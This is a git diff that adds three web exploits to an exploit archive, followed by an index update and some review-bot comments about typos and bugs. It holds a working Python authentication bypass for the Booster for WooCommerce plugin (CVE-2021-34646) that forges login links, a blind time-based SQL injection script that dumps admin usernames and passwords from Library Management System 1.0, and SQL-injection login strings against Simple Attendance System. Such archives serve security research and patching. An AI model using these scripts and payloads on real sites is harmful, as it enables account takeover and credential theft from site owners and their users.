diff --git a/exploits/php/webapps/50299.py b/exploits/php/webapps/50299.py
new file mode 100755
index 000000000..a5eb59faa
--- /dev/null
+++ b/exploits/php/webapps/50299.py
@@ -0,0 +1,79 @@ +# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass +# Date: 2021-09-16 +# Exploit Author: Sebastian Kriesten (0xB455) +# Contact: https://twitter.com/0xB455 +# +# Affected Plugin: Booster for WooCommerce +# Plugin Slug: woocommerce-jetpack +# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/ +# Affected Versions: <= 5.4.3 +# Fully Patched Version: >= 5.4.4 +# CVE: CVE-2021-34646 +# CVSS Score: 9.8 (Critical) +# Category: webapps +# +# 1: +# Goto: https://target.com/wp-json/wp/v2/users/ +# Pick a user-ID (e.g. 1 - usualy is the admin) +# +# 2: +# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1 +# +# 3: +# Check-Out out which of the generated links allows you to access the system +# +import requests,sys,hashlib +import argparse +import datetime +import email.utils +import calendar +import base64 + +B = "\033[94m" +W = "\033[97m" +R = "\033[91m" +RST = "\033[0;0m" + +parser = argparse.ArgumentParser() +parser.add_argument("url", help="the base url") +parser.add_argument('id', type=int, help='the user id', default=1) +args = parser.parse_args() +id = str(args.id) +url = args.url +if args.url[-1] != "/": # URL needs trailing / + url = url + "/" + +verify_url= url + "?wcj_user_id=" + id +r = requests.get(verify_url) + +if r.status_code != 200: + print("status code != 200") + print(r.headers) + sys.exit(-1) + +def email_time_to_timestamp(s): + tt = email.utils.parsedate_tz(s) + if tt is None: return None + return calendar.timegm(tt) - tt[9] + +date = r.headers["Date"] +unix = email_time_to_timestamp(date) + +def printBanner(): + print(f"{W}Timestamp: {B}" + date) + print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n") + print("We need to generate multiple timestamps in order to avoid delay related timing errors") + print("One of the following links will log you in...\n") + +printBanner() + + + +for i 
in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors + hash = hashlib.md5(str(unix-i).encode()).hexdigest() + print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:") + token='{"id":"'+ id +'","code":"'+hash+'"}' + token = base64.b64encode(token.encode()).decode() + token = token.rstrip("=") # remove trailing = + link = url+"my-account/?wcj_verify_email="+token + print(link + f"\n{RST}") \ No newline at end of file diff --git a/exploits/php/webapps/50300.py b/exploits/php/webapps/50300.py new file mode 100755 index 000000000..802b2a040 --- /dev/null +++ b/exploits/php/webapps/50300.py 
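Review bot: The header comment's disclosure URL contains a stray `=` in `critical=-authentication-bypass`, which is unlikely to resolve as written; check it against the published Wordfence post before this entry is archived. The step-2 comment also invokes `./exploit_CVE-2021-34646.py` while the file is added as `50299.py`, and the file is committed as mode 100755 with a `#` comment rather than a shebang on its first line, so the `./` invocation would not run under the Python interpreter; either add `#!/usr/bin/env python3` as line 1 or drop the executable bit. As a point of style, `id` and `hash` shadow builtins; `user_id = str(args.id)` and `digest = hashlib.md5(str(unix-i).encode()).hexdigest()` read more clearly and avoid masking the builtins for the rest of the script.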
@@ -0,0 +1,148 @@ +# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated) +# Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec) +# Date: 16/09/2021 +# Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip +# Vendor: breakthrough2 +# Tested on: Kali Linux, Apache, Mysql +# Version: v1.0 +# Exploit Description: +# Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack. +# Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html +import requests,argparse +from colorama import (Fore as F, Back as B, Style as S) + +BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT +def bullet(char,color): + C=FB if color == 'B' else FR if color == 'R' else FG + return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' +info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G') +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} + +# POST /LibraryManagement/fine-student.php +# inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha +def sqliPayload(char,position,userid,column,table): + sqli = 'inject\' UNION SELECT IF(SUBSTRING(' + sqli += str(column)+',' + sqli += str(position)+',1) = \'' + sqli += str(char)+'\',sleep(1),null) FROM ' + sqli += str(table)+' WHERE adminId=' + sqli += str(userid)+'; -- kamahamaha' + return sqli + +chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', + 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', + 
'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', + 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7', + '8','9','@','#'] + +def postRequest(URL,sqliReq,char,position,pxy): + sqliURL = URL + params = {"check":1,"id":sqliReq} + if pxy: + req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies,timeout=10) + else: + req = requests.post(url=sqliURL, data=params, verify=False, timeout=10) + #print("{} : {}".format(char,req.elapsed.total_seconds())) + return req.elapsed.total_seconds() + +def theHarvester(target,CHARS,url,pxy): + #print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id'])) + position = 1 + theHarvest = "" + while position < 8: + for char in CHARS: + sqliReq = sqliPayload(char,position,target['id'],target['column'],target['table']) + if postRequest(url,sqliReq,char,position,pxy) > 1: + theHarvest += char + break; + position += 1 + return theHarvest + +class userObj: + def __init__(self,username,password): + self.username = username + self.password = password + +class tableSize: + def __init__(self,sizeU,sizeP): + self.sizeU = sizeU + self.sizeP = sizeP + self.uTitle = "Admin Usernames"+" "*(sizeU-15)+BR+" "+ST + self.pTitle = "Admin Passwords"+" "*(sizeP-15)+BR+" "+ST + def printHeader(self): + width = self.sizeU+self.sizeP+3 + print(BR+" "*width+ST) + print(self.uTitle,self.pTitle) + print(BR+" "*width+ST) + +def printTableRow(user,size): + username = user.username + unLen = len(username) + if unLen < size.sizeU: + username = username+(" "*(size.sizeU - unLen)) + else: + name = name[:size.sizeU] + username += BR+" "+ST + password = user.password + pLen = len(password) + if pLen < size.sizeP: + password = password+(" "*(size.sizeP - pLen)) + else: + password = password[:size.sizeP] + password += BR+" "+ST + print(username,password) + + +def sig(): + SIG = SB+FY+" .-----.._ ,--.\n" + SIG += FY+" | .. > ___ | | .--.\n" + SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. 
|/ /__ __\n" + SIG += FY+" | ) "+FR+" * *"+FY+" / \\ \\\n" + SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n" + SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST + return SIG + +def argsetup(): + about = SB+FT+'Unauthenticated Blind Time-Based SQL Injection Exploit - Library Manager'+ST + parser = argparse.ArgumentParser(description=about) + parser.add_argument('targetHost',type=str,help='The DNS routable target hostname. Example: "http://0xBoku.com"') + parser.add_argument('DumpXAdmins',type=int,help='Number of admin credentials to dump. Example: 5') + parser.add_argument('-p','--proxy',type=str,help='<127.0.0.1:8080> Proxy requests sent') + args = parser.parse_args() + if args.proxy: + regex = '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}$' + if re.match(regex,args.proxy,re.IGNORECASE): + args.proxy = {'http':'http://{}'.format(args.proxy),'https':'https://{}'.format(args.proxy)} + else: + print('{}Error: Supplied proxy argument {} fails to match regex {}'.format(err,args.proxy,regex)) + print('{}Example: {} -p "127.0.0.1:8080"'.format(err,sys.argv[0])) + sys.exit(-1) + else: + proxy = False + return args + +if __name__ == "__main__": + header = SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST + print(header) + print(sig()) + args = argsetup() + host = args.targetHost + pxy = args.proxy + admins = args.DumpXAdmins + PATH = host+"/LibraryManagement/fine-student.php" + size = tableSize(20,20) + size.printHeader() + dumpnumber = 1 + while dumpnumber <= admins: + adminUsername = { "id":dumpnumber, "table":"admin", "column":"username"} + adminUsername = theHarvester(adminUsername,chars,PATH,pxy) + adminPassword = { "id":dumpnumber, "table":"admin", "column":"password"} + adminPass = theHarvester(adminPassword,chars,PATH,pxy) + adminUser = userObj(adminUsername,adminPass) + printTableRow(adminUser,size) + # print("Admin's Username is: {}".format(adminUsername)) + # print("Admin's Password is: {}".format(adminPass)) + dumpnumber 
+= 1 \ No newline at end of file diff --git a/exploits/php/webapps/50301.txt b/exploits/php/webapps/50301.txt new file mode 100644 index 000000000..df294a856 --- /dev/null +++ b/exploits/php/webapps/50301.txt @@ -0,0 +1,33 @@ +# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass +# Exploit Author: Abdullah Khawaja (hax.3xploit) +# Date: September 17, 2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip +# Tested on: Linux, windows +# Vendor: oretnom23 +# Version: v1.0 + +# Exploit Description: +Simple Attendance System, is prone to multiple vulnerabilities. +Easy authentication bypass vulnerability on the application +allowing the attacker to login + + +----- PoC: Authentication Bypass ----- + +Administration Panel: http://localhost/attendance/login.php + +Username: admin' or ''=' -- -+ +Password: admin' or ''=' -- -+ + + +----- PoC-2: Authentication Bypass ----- + +Steps: +1. Enter wrong crendentials http://localhost/attendance/login.php +2. Capture the request in burp and send it to repeater. +3. Forward the request. +4. In response tab, replace : + {"status":"failed","msg":"Invalid username or password."} + with + {"status":"success","msg":"Login successfully."} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 14c41ae78..8791f8482 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
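Review bot: In `printTableRow`, the truncation branch assigns `name = name[:size.sizeU]` but `name` is never defined, so a username of `size.sizeU` characters or more raises NameError instead of being clipped; the intended line is `username = username[:size.sizeU]`, matching the password branch below it. `argsetup` also calls `re.match` and `sys.argv` without `re` or `sys` being imported, and its `proxy = False` is a dead local that nothing reads. The header records the software link and a walkthrough but no vendor fix status or advisory identifier; a `# Fixed in:` line, or an explicit note that no fix was available at publication, is what anyone triaging this entry looks for first. Minor style: `break;` carries a stray semicolon, and `userObj`, `tableSize` and `theHarvester` do not follow PEP 8 naming.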
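Review bot: Step 1 of PoC-2 has the typo `crendentials`; it should read `1. Enter wrong credentials http://localhost/attendance/login.php`. The title line says `Authenticated bypass` while the description body describes an authentication bypass; the title should use the same term so the index row and the entry agree. The header also gives no fixed version or vendor response, which is the first thing a defender checks for an entry like this; stating it, or stating that none was available at the time of writing, would make the record complete.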
@@ -44417,3 +44417,6 @@ id,file,description,date,author,type,platform,port
 50295,exploits/hardware/webapps/50295.txt,"Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",webapps,hardware,
 50296,exploits/php/webapps/50296.py,"Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
 50297,exploits/php/webapps/50297.py,"AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ricardo Ruiz",webapps,php,
+50299,exploits/php/webapps/50299.py,"WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass",1970-01-01,0xB455,webapps,php,
+50300,exploits/php/webapps/50300.py,"Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,boku,webapps,php,
+50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",1970-01-01,"Abdullah Khawaja",webapps,php,
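Review bot: The three added rows carry the date `1970-01-01`, while the exploit headers added in this same commit give `2021-09-16` for 50299 and 50300 and `September 17, 2021` for 50301, so the index misreports when these entries were published. The author column is also inconsistent with the files: 50300.py credits two authors in its header but the row lists only `boku`. If the epoch date is a deliberate placeholder that a later indexing step overwrites, saying so in the commit message would save the next reader the check.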